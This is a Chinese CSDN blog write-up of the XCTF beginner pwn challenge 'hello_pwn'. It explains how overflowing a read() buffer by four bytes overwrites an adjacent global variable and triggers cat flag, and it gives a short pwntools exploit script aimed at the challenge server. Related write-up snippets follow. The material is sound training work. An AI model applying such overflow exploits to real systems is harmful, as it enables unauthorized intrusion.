攻防世界PWN-hello_pwn

最新推荐文章于 2024-07-26 15:25:27 发布
最新推荐文章于 2024-07-26 15:25:27 发布
阅读量409 收藏 1
点赞数
分类专栏: ctf 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Deeeelete/article/details/109695419
版权

题目:hello_pwn

在这里插入图片描述



进pe查看程序

在这里插入图片描述


因为该题目比较简单,所以确认是64位程序,直接进IDA

在这里插入图片描述
f5反编译main函数

在这里插入图片描述
单独摘出代码

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  alarm(0x3Cu);
  setbuf(stdout, 0LL);
  puts("~~ welcome to ctf ~~     ");
  puts("lets get helloworld for bof");
  read(0, &unk_601068, 0x10uLL);
  if ( dword_60106C == 1853186401 )
    sub_400686(0LL, &unk_601068);
  return 0LL;
}

有一个if判断,判断条件是dword_60106C == 1853186401,下面是一个sub_400686函数,点进去查看,发现能直接cat flag

在这里插入图片描述
也就是说要试图让程序满足dword_60106C == 1853186401,且没有该变量的直接输入点,但该变量的上方存在一个unk_601068变量,这个变量却是我们可以正常输入的,因此对该变量进行溢出攻击,从而把数值写给我们需要构造的dword_60106C 变量

双击&unk_601068查看其地址:0000000000601068

在这里插入图片描述在这里插入图片描述
双击查看dword_60106C变量的地址:000000000060106C

在这里插入图片描述
在这里插入图片描述
计算两个地址之间的偏移,大数减小数,十六进制6C-68得出十进制结果:4,或者在偏移量较小的情况下直接在IDA里数

从6C开始往上数,下开上闭(下方是开区间,上方是闭区间),数到68刚好是4,4个偏移之后就可以把我们构造的内容溢出到指定变量中

在这里插入图片描述
编写脚本:

from pwn import *
r = remote("220.249.52.133",37527)
payload = 'A'*4 + p64(1853186401)
r.sendline(payload)
r.interactive()

运行脚本:

在这里插入图片描述

Deeeelete
关注
专栏目录
攻防世界(pwn篇)---CGfsb
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-09 1770
攻防世界(pwn篇)—CGfsb 文章目录攻防世界(pwn篇)---CGfsb题目描述基本情况分析运行分析IDA 分析格式化字符串漏洞分析出payload找一下 s 的偏移量再看一看 pwnme 的地址exp 题目描述 菜鸡面对着pringf发愁,他不知道prinf除了输出还有什么作用 基本情况分析 checksec命令可以查看可执行文件开启的保护 1.RELRO: RELRP会有Pratial RELRO 和FULL RELRO,如果开启FULL RELRO,意味着我们无法修改got表 2.S
攻防世界pwn-hello_pwn
a_silly_coder的博客
01-16 1942
下载文件后,首先检查保护: 将文件拖入64位ida,查看代码 基本逻辑是:读取一个输入,存入unk_601068,接着比较dword_60106C是否等于一个预期的值,如果相等,执行对应函数,函数内直接执行cat flag.txt 所以思路就是需要覆盖dword_60106C,让其等于预期值,此时我们需要在输入unk_601068时,对dword_60106C进行覆盖,接着我们查看这两个值的存放位置。 发现这两个值之间相隔4个字节,所以需要4个字节的填充数据,接着输入预期值。..
攻防世界 - pwn - hello_pwn
qq726232111的博客
03-16 494
A、程序分析 1、缓冲区地址为601068h 2、判断条件 --> 60106Ch为起始地址 , 存储6E756161h 3、判断条件成立执行cat flag B、利用分析 1、601068h -60106Bh --> 4byte 填充数据 60106Ch - 60106Fh --> 4byte 判断条件 0x6E756161 ...
攻防世界XCTF-Pwn入门11题解题报告
最新发布
HUANGXIN9898的博客
07-26 736
PwnCTF中至关重要的项目,一般来说都是Linux二进制题目,零基础的同学可以看《程序员的自我修养》,主要题型包括:缓冲区溢出、Return to Libc、格式化字符串、PLT GOT等。
攻防世界hello_pwn
2301_80216972的博客
04-09 337
pe分析知道是elf文件(elf文件是Linux下的可执行文件,可以在Linux直接运行)ida分析:下载后ida打开找到main函数,F5反编译。
攻防世界pwn刷题--hello_pwn
m0_74073577的博客
09-29 194
0x60106c-0x611068=4个字节,那么输入4个a就可以到达目标地址(python里b’a‘的长度是一个字节),再输入‘nuaa‘即可,需要注意的是checksec后是小端序,绝大部分题目都是小端序,所以数据高位应该在地址低位,即输入’aaun‘,总体的payload应该是aaaa+aaun,如果暂时无法理解这个亦可以使用pwntools工具,使用p64打包数据即可,这样的话payload应该是payload=b’a‘*4+p64(0x6E756161),这个0x6E。结果是‘nuaa’。
攻防世界_pwn_hello_pwn(萌新版)
TedLau的博客
02-24 570
首发于鄙人博客:传送门 0x00 前言 file checksec已省略。64位elf程序 0x10 步骤 0x11 main函数 在main函数中我们可以看到,它让我们输入unk_601068的值,而如果我们想getshell,那么我们便需要将dword_60106c的值赋为1853186401。 0x11 bss段观察 可以看到这两个数据的距离并不远,所以...
攻防世界 pwn
清霂的博客
02-02 687
目录1.get_shell2.when_did_you_born3.hello_pwn4.level05.level26.cgpwn2 1.get_shell nc连接题 连接后ls | cat flag 2.when_did_you_born file checksec 有canary保护,不能栈溢出 ida64 先输入v5,v5不能等于1926。再输入v4,注意有gets函数,不限制输入,但无法溢出,点进去v4,v5 发现var_18是v5,var_20是v4,那么可以输入v4时将v5的值覆盖为19
初学pwn-攻防世界(hello_pwn)
天柱的博客
08-26 3470
初学pwn-writeUp 攻防世界的第二道题目,hello_pwn。 首先创建场景,使用nc进入远端,发现他只输出了一串字符串,没有别的内容,也无法使用ls查看它的文件。 下载场景提供的文件,使用cat查看,发现是ELF文件,按照大佬的流程,ELF文件直接用ida打开。 初次使用ida,深切的感受到了ida的强大。 打开之后,按F5,进行反编译,可以看到main函数的伪代码 可以从main函数中看到,这里存在一个判断,如果条件达成的话,会调用一个函数。点开函数看一下。 可以发现里边会输出flag.tx
[CTF-PWN]攻防世界新手村-hello_pwn[wp]
murongxuege的博客
10-01 2590
事件起因(无语) 手残博主因在27日从根地址误删了自己两年半配置和使用的kali虚拟机。。。在一步步恢复环境配置的时候,从头到尾刷一遍题,总结思路。 题目分析 开启场景后,服务端会开启对应的端口,并在端口上部署和附件相同的ELF二进制可执行文件,我们要做的就是下载附件并在本地进行反汇编,反编译等操作分析程序漏洞,从而利用漏洞获取题目的flag。 从描述中可以看出当前程序是要进行年龄的输入操作的,有输入操作,还是在新手村,那么大概率是gets()等C函数输入漏洞,进一步猜测是普通的内存地址覆盖的题。 che
攻防世界pwn-level0详细步骤
m0_74047686的博客
02-28 1408
学习pwn开始,慢慢来不要急
攻防世界hello pwn WP(pwn入门基础题)
m0_62584974的博客
11-21 2113
攻防世界hello pwn WP(pwn入门基础题)的简单讲解
攻防世界hello _pwn总结
RMC131的博客
11-13 4591
checksec 转自:checksec工具使用-pwn – 简书 (jianshu.com) 基本用法:checksec –file=hello_pwn Arch: 系统架构信息,判断是64位还是32位,选择相应的IDA和写相应的exp。 amd64-64-little说明为64位,选用64位的IDA,写64位的exp。 RELRO: Relocation Read-Only (RELRO),此项技术针对GOT/GIFTO(区块链)改写的攻击方式。分为两种,Partial RELRO 和 Full RE
攻防世界 Pwn hello_pwn
MrTreebook的博客
10-18 380
攻防世界pwn hello_pwn 文章目录攻防世界pwn hello_pwn1.checksec走一下2.先跑一下看看4.exp如下5.运行结果如下6.可以不用python总结 1.checksec走一下 可以看到只有 Partial RELRO 没有开启栈保护,是属于简单的栈溢出pwn题 2.先跑一下看看 ## 3.拉进IDA看一下 sub_400686函数中调用系统函数直接获取flag 因此如果让60106c == 1853186401就可以获取到flag 看到危险函数read可以实现栈
攻防世界-hello_pwn
qq_52333044的博客
06-22 257
第一种:通过先输入四给任意字符再输入"aaun" (为什么是aaun呢,因为小端序和大端序的问题,小端序低地址存低位,大端序就是低地址存高位,这里采用小端序)unk-601068和dword——60106C相差4 个字节,然后我们可以通过覆盖来改变dwod_60106c的赋值。发现当unk_601068等于nuaa时才能得到flag。习惯性的用ls没有什么用,然后查看是多少位。然后用64位IDA打开查看程序。用kali linux 打开。第二种:就直接写exp。
攻防世界 hello_pwn
weixin_73399382的博客
06-30 365
然后从指针&unk_601068指定的缓冲区里面读取最多16位数据(0x10uLL解读:0x代表十六进制,uLL=unsigned long long,无符号long long 型,10转为十进制即为16)直接执行一下,这里看别人的wp是可以通过输入构造字符串来getshell的,我这里就不这么做了,多练写脚本的能力。国际惯例checksec一下,64位小端序,未开启栈溢出保护和地址随机化,很明显这道题利用栈溢出了。刚学pwn的小白,大家互相学习,看看哪里说得不对打在评论区!写脚本,下面两个略微差别。
[攻防世界]hello_pwn
逆向萌新的博客
06-20 303
[攻防世界]hello_pwn
攻防世界pwn第二题-hello pwn(两种方法)
Greic的博客
11-28 2037
嘿嘿,我又回来了。看到上次自己发的博客,感觉图片的排版好差劲 这次我将!搞好一点(hhh),话不多说,开始。 至于前面的检查保护类型和看文件类型就不说了,有兴趣的小伙伴们可以看看pwn的第一题。有一说一,其实这道题已经有很大大佬发过write-up了,大佬们也写的很好,我在做题的过程中,也看过一些大佬们的write-up,但嘛,写一写,总是比没有好叭。 在检查完文件类型和保护机制后,我们很容易发现,就是一个很普通的64位的Linux件,且并没有什么保护类型。这个时候,我们先运行看看...
攻防世界-PWN-hello_pwn
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
09-24 504
开始进军PWN题 目录 分析 拖入IDA exp 分析 使用 file 和 checksec(查看程序的保护机制) 指令分析文件 x86-64 架构 Linux可执行文件ELF checksec参数 Arch 程序架构信息。这里是amd64-64的 RELRO 主要针对 GOT 改写的攻击方式的保护 RELRO为” Partial RELRO”,说明我们对GOT表具有写权限。 这里也没作保护 Stack 栈保护 这里没有启用 NX 栈没有执行权限 这里是打开的 PI.
攻防世界pwn-forgot
08-10
很抱歉,但是我无法回答你的问题。我只能提供关于麦田怪圈的信息。123 #### 引用[.reference_title] - *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界PWN刷题-forgot](https://blog.csdn.net/m0_53932372/article/details/122244244)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Deeeelete

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值